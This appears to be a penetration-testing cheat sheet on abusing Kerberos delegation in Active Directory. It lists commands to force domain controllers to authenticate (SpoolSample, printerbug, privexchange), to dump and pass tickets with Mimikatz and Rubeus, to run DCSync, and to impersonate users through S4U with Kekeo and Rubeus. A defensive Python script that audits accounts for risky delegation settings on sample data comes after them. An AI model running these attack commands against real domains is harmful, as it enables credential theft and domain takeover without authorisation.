Delegation

Unconstrained delegation

https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/

Requirements
  1. Control over an account with unconstrained delegation privileges
  2. A way to connect victim users/computers to us

Make a DA connect to us

https://github.com/leechristensen/SpoolSample

.\SpoolSample.exe <DC> <compromised_host>
python printerbug.py <VICTIM>/<user>:<password>@<dc.internal.dom> <client_share>
python privexchange.py -u <user> -p <password> -ah <evil.internal.dom> <exchange.internal.dom> -d <internal.dom>

Mimikatz

Opsec unsafe: Touches LSASS!

The TGT for the <COMPUTER$> account should now be available:

sekurlsa::tickets
kerberos::ptt ticket.kirbi
lsadump::dcsync /domain:<domain> /user:<user>

Rubeus

Opsec safer: Uses LsaCallAuthenticationPackage with a GetSystem token elevation approach, so LSASS isn’t touched!

Rubeus.exe dump
Rubeus.exe monitor [/interval:SECONDS] [/filteruser:USER]

Constrained delegation

Kekeo

Request TGT

tgt::ask /user:<VULN_ACCOUNT> /domain:<DOMAIN> /rc4:<RC4key>
tgt::ask /user:<VULN_ACCOUNT> /domain:<DOMAIN> /aes:<AESkey>

PTT via S4U

tgs::s4u /user:<IMPERSONATED_USER>@<domain> /service:<DELEGATED_SVC>/<FQDN_MACHINE> /ptt /tgt:<TGT_FILE>

Rubeus

PTT via S4U

Rubeus.exe s4u /user:<user_with_delegation> /domain:<DOMAIN> /rc4:<RC4key> /impersonateuser:<user_impersonated> /msdsspn:"<delegated_svc>/<FQDN_machine>" /ptt

Constrained delegation with Protocol Transition

Resource-based Constrained delegation

- https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff#file-rbcd_demo-ps1-L16
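
Audit side of the four delegation types above, as an added example (not code from this page or from the linked tools): it classifies directory entries by their userAccountControl flags and delegation attributes, and reports privileged accounts that lack the "sensitive and cannot be delegated" flag. The entry dicts, account names, SPNs and the PRIVILEGED set are constructed sample data; the assumption is that real entries come from an LDAP export with the same attribute names.

```python
# userAccountControl bits (documented Active Directory values)
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition

def classify(entry):
    """Return the set of delegation types configured on one directory entry."""
    uac = int(entry.get("userAccountControl", 0))
    kinds = set()
    if uac & TRUSTED_FOR_DELEGATION:
        # DCs carry this flag by default, so they are labelled separately.
        kinds.add("unconstrained-dc" if uac & SERVER_TRUST_ACCOUNT else "unconstrained")
    if entry.get("msDS-AllowedToDelegateTo"):
        kinds.add("constrained-protocol-transition"
                  if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "constrained")
    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        kinds.add("rbcd-target")
    return kinds

def audit(entries, privileged):
    """Return (account, finding) pairs for review, in input order."""
    findings = []
    for e in entries:
        name = e["sAMAccountName"]
        uac = int(e.get("userAccountControl", 0))
        findings.extend((name, k) for k in sorted(classify(e) - {"unconstrained-dc"}))
        if name in privileged and not (uac & NOT_DELEGATED):
            findings.append((name, "privileged-but-delegatable"))
    return findings

# Constructed sample entries (hypothetical names, not from a real directory).
SAMPLE = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000 | 0x80000},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000 | 0x80000},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200 | 0x1000000,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/db01.corp.example:1433"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": ["HTTP/app01.corp.example"]},
    {"sAMAccountName": "FILE01$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},
    {"sAMAccountName": "adm_alice", "userAccountControl": 0x200},
    {"sAMAccountName": "adm_bob", "userAccountControl": 0x200 | 0x100000},
]
PRIVILEGED = {"adm_alice", "adm_bob"}

if __name__ == "__main__":
    for account, finding in audit(SAMPLE, PRIVILEGED):
        print(f"{account:12} {finding}")
```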